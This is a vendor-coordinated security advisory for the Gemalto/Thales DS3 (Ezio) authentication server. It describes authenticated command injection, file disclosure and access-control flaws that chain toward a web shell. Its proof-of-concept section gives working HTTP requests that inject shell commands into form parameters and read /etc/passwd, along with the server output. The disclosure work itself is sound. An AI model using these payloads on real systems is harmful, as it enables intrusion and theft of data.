Multiple Vulnerabilities In Gemalto (Thales Group) Ds3 Authentication Server / Ezio Server

Title

Multiple vulnerabilities

Product

Gemalto (Thales Group) DS3 Authentication Server / Ezio Server

Vulnerable Version

Ezio DS3 server <v3.1.0

Fixed Version

Ezio DS3 server v3.1.0

CVE Number

CVE-2019-9156, CVE-2019-9157, CVE-2019-9158

Impact

medium

Found

11.02.2019

By

TING Meng Yean (Office Singapore) | SEC Consult Vulnerability Lab

SEC Consult identified multiple vulnerabilities within the DS3 Authentication Server (now called Gemalto Ezio Server, part of the Thales Group) which can be chained together to allow a low-privileged application user to upload a JSP web shell with the access rights of a low privileged Linux system user.

Vendor Description

DS3 Authentication Server is an appliance that provides authentication and end-to-end encryption for online banking and remote transactions. DS3 has been acquired by Gemalto, and the Authentication Server is now known as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital

 

Business Recommendation

The vendor provides a patch and users of this product are urged to upgrade to the latest version available.

An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues.

 

Vulnerability Overview / Description

The DS3 Authentication Server is prone to several security issues as described below that when combined, allows a low-privileged application user to upload a JSP web shell with the access rights of the lower privileged Linux system user “asadmin”.

The CVSSv3 scores have been provided by the vendor.

1) Semi-Blind OS Command Injection (Post-authenticated)

The DS3 Authentication Server provides several administration tools to perform connectivity checks. “TestTelnetConnection.jsp” does not correctly validate the user input for the “HOST_NAME” and “PORT_NUMBER” parameters, allowing an attacker to execute arbitrary commands on the server side with the privileges of the local system user “asadmin”.

2) Limited Local File Disclosure (LFD) (Post-authenticated)

The DS3 Authentication Server provides several administration tools to check the system’s access and error logs. “TailLogs.jsp” does not correctly validate the user input for the “LOG_TYPE” parameter, allowing an attacker to read arbitrary local files with the privileges of the local system user “asadmin”.

3) Broken Access Control (Post-authenticated)

The DS3 Authentication Server provides several permission groups, granting different levels of privileges, from the administrative “dsssAdmin” group to the low privileged “READ_ONLY” group. A user with the “dsssAdmin” group can see more functions in the menu of the web portal than a user with the “READ_ONLY” group. However, the user with the “READ_ONLY” group can access some “dsssAdmin” functions by replaying the POST or GET request directly.

Proof Of Concept

1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)

This POC was performed using a user with the “READ_ONLY” group permission.

This exploit also has the following two restrictions:

  1. The bash commands injected cannot contain any space (' '/%20)
  2. The output of the bash commands injected must be null or cannot contain any space (''
    /%20). However, the tester was able to create complex bash commands payload without any space (' '/%20) by using a bash trick.

The simple OS command payload “whoami” injected into the HOST_NAME parameter and the HTTP response with the result of the payload asadmin mixed in. Please note that the OS command payload is enclosed with the `` characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1 Host: $IP Cookie: JSESSIONID= Content-Type: application/x-www-form-urlencoded Content-Length: 132 CSRFTOKEN=&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09 HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Server: DS3-AuthServer Content-Length: 12987 ... <textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time : ... SGT 2019 End time : ... SGT 2019 Time taken (ms): 3 Attempting connection to 127.0.0.1`whoami` on port 8443 ... 127.0.0.1asadmin/8443: Temporary failure in name resolution Error connecting to 127.0.0.1`whoami` on port 8443 Successful connection to 127.0.0.1`whoami` on port 8443 </textarea> ...

The complex bash command payload without any space (' '/%20) representing ls -1 | tail -1 injected into the PORT_NUMBER parameter and the HTTP response with the result of the payload liquibase.out mixed in. Please note that the OS command payload is enclosed with the `` characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1 Host: $IP Cookie: JSESSIONID= Content-Type: application/x-www-form-urlencoded Content-Length: 173 CSRFTOKEN=&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09 HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Server: DS3-AuthServer Content-Length: 13159 ... <textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time : ... SGT 2019 End time : ... SGT 2019 Time taken (ms): 8 Attempting connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2` 127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype Error connecting to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2` Successful connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2` </textarea> ...

 

2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)

This POC was performed using an admin user with the dsssAdmin group permission, as the ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility function is not accessible to users with the READ_ONLY group permission.

This exploit has the following two restrictions:

  1. Only the last 10 lines of the file are displayed.
  2. Directory traversal was not allowed, as the parameter cannot contain two dot (.) characters.

However, the tester was able to bypass the directory traversal restriction by injecting the arbitrary filename as another argument, rather than to modify the first argument.

The file /etc/passwd injected into the LOG_TYPE parameter and the response with the last 10 lines of the file returned. Please note that the injected filename is preceded with the + character.

GET /ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token> HTTP/1.1 Host: $IP Cookie: JSESSIONID=<jsessionid_cookie> HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000;includeSubDomains X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=utf-8 Content-Length: 3702 Server: DS3-AuthServer ... <TR Border=0 Align="LEFT"> <TD COLSPAN=2> <TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS"> ==> /home/data/log/ <== ==> /etc/passwd <== ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mysql:x:501:501::/home/mysql:/sbin/nologin asadmin:x:502:502::/home/asadmin:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin haproxy:x:503:504::/home/haproxy:/sbin/nologin </TEXTAREA> </TD> ...

3) Broken Access Control (Post-authenticated) (CVE-2019-9158)

The admin user with the “dsssAdmin” group permission is able to access the following chain of functions in the menu of the web portal.

  • ADMINISTRATION -> Log Manager -> View Log
  • ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

The user with the READ_ONLY group permission is not able to access the following chain of function in the menu of the web portal.

  • ADMINISTRATION -> Log Manager -> View Log

Based on the web portal, a user with the “READ_ONLY” group permission should
also not be able to access the following chain of function.

  • ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

However, it was noted that a user with the READ_ONLY group permission is able to access the Tail Logs Utility function with the GET request (captured from
the dsssAdmin user’s request) directly with the READ_ONLY user’s session cookie and CSRFTOKEN token.

$IP/ServerAdmin/TailLogs.jsp;https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=

Vulnerable / Tested Versions

The following version has been tested and found to be vulnerable:

  • 2.6.1-SP01

The following version was confirmed to be vulnerable by the vendor:

  • All versions earlier than v3.1.0

 

Vendor Contact Timeline

2019-02-27 Contacting vendor through csirt@gemalto.com (Gemalto CERT)
2019-03-08 Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server version 2.8.0-update01 and earlier. Requested 2 months disclosure embargo period to implement fix for future release.
2019-03-22 Gemalto CERT confirmed the fix for the reported vulnerabilities to be included in current sprint and provided CVSSv3 scoring and CWE assigned.
2019-03-22 Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05 Gemalto CERT provided updated CVSSv3 metrics.
2019-04-18 Gemalto CERT informed that the fix for the 3 vulnerabilities was planned in the upcoming of Ezio DS3 server v3.1.0 release by 1st week of May, and asked for extension of embargo period. Furthermore, Gemalto is now part of the Thales Group.
2019-05-06 Patches available
2019-05-09 Coordinated release of security advisory.

Solution

According to the vendor the patches are provided to the Support Team L2 and Professional Services team and those teams will get in touch with the technical contacts of the customers. The update will also be announced via a future newsletter.

Furthermore, SEC Consult have been informed that the branch 2.x of Ezio DS3 server is not fixed yet and a patch will be available at a later date. However, customers are reminded about deployment guidelines to reduce their attack surface.

 

Workaround

As the vulnerabilities need authentication with valid credentials to the portal, it is recommended to deploy the application in a trusted zone and should be restricted to the customer’s internal secure network.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF TING Meng Yean / @2019

Contact

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.